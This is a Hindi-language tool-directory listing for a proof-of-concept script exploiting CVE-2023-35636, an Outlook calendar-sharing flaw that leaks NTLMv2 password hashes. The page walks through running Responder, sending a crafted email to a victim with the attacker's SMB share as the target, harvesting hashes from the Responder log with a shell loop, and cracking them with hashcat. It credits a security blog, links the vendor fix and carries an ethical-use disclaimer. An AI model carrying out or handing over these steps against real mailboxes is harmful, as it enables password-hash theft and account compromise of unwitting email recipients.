Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-35636 — Microsoft Outlook सूचना प्रकटीकरण भेद्यता (पासवर्ड हैश लीक) - Expect Script POC | Kitploit
उपकरण/GitHubGitHub/duy-31/cve-2023-35636
पासवर्ड हमलेभेद्यता विश्लेषणशोषणडेटा निष्कासनलर्निंग और शिक्षाईमेल सुरक्षा
GitHubduy-31/cve-2023-35636

CVE-2023-35636

Microsoft Outlook सूचना प्रकटीकरण भेद्यता (पासवर्ड हैश लीक) - Expect Script POC

रिपॉजिटरी देखें
43642 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-35636

Microsoft Outlook सूचना प्रकटीकरण भेद्यता (पासवर्ड हैश लीक) - Expect स्क्रिप्ट POC

CVE-2023-35636 Microsoft Outlook में कैलेंडर साझाकरण फ़ंक्शन का शोषण है, जिसमें एक ईमेल में दो हेडर जोड़ने से Outlook सामग्री साझा करने और एक निर्दिष्ट मशीन से संपर्क करने का निर्देश देता है, जिससे NTLM v2 हैश को इंटरसेप्ट करने का अवसर मिलता है।

  • SMB सर्वर चालू रखते हुए एक रिस्पॉन्डर चलाएँ

image

  • एक ईमेल भेजें और प्रतीक्षा करें (ईमेल प्राप्तकर्ता के फायरवॉल को SMB (445) ट्रैफिक को पास करने देना होगा)

usage: ./cve-2023-35636.sh mx.fqdn port email_sender email_recipient smb_share

./cve-2023-35636.sh mail.mydomain.com 25 [email protected] [email protected] \\\\x.x.x.x\\mycalendar.ics (dont forget all the \)

image

नोट्स: chmod +x cve-2023-35636.sh

एप्लिकेशन expect की आवश्यकता है

वैध IP प्रेषक और ईमेल प्रेषक की आवश्यकता है (SPF, DKIM, DMARC पास करने के लिए)

  • यदि प्राप्तकर्ता उपयोगकर्ता छोटे कैलेंडर आइकन पर क्लिक करता है .. BOOM आईपी/उपयोगकर्ता (स्पष्ट टेक्स्ट) और पासवर्ड हैश (NTLM-v2-SSP) आपके रिस्पॉन्डर आईपी पर भेज दिए जाते हैं

image

image

  • फिर आप हैशकैट/जॉन द रिपर से पासवर्ड क्रैक करने का प्रयास कर सकते हैं

for user in strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'

do

echo "[*] search for: $user";

strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -i $user | cut -d ":" -f 4-10 | head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt

done

hashcat -a 0 -m 5600 ntlm-hashes.txt rockyou.txt -o cracked.txt -O


श्रेय: https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes

वर्कअराउंड/फिक्स: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35636


मेरे बारे में और जानें ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ अस्वीकरण: महत्वपूर्ण: यह स्क्रिप्ट केवल शैक्षिक, नैतिक परीक्षण और कानूनी उपयोग के लिए प्रदान की गई है। बिना स्पष्ट अनुमति के किसी भी सिस्टम या नेटवर्क पर इसका उपयोग न करें। कंप्यूटर सिस्टम और नेटवर्क तक अनधिकृत पहुंच अवैध है, और अनधिकृत गतिविधियों में पकड़े गए उपयोगकर्ता कानूनी कार्रवाई के अधीन हैं। लेखक इस स्क्रिप्ट के दुरुपयोग से होने वाली किसी भी क्षति के लिए जिम्मेदार नहीं है।

टूल डाउनलोड करें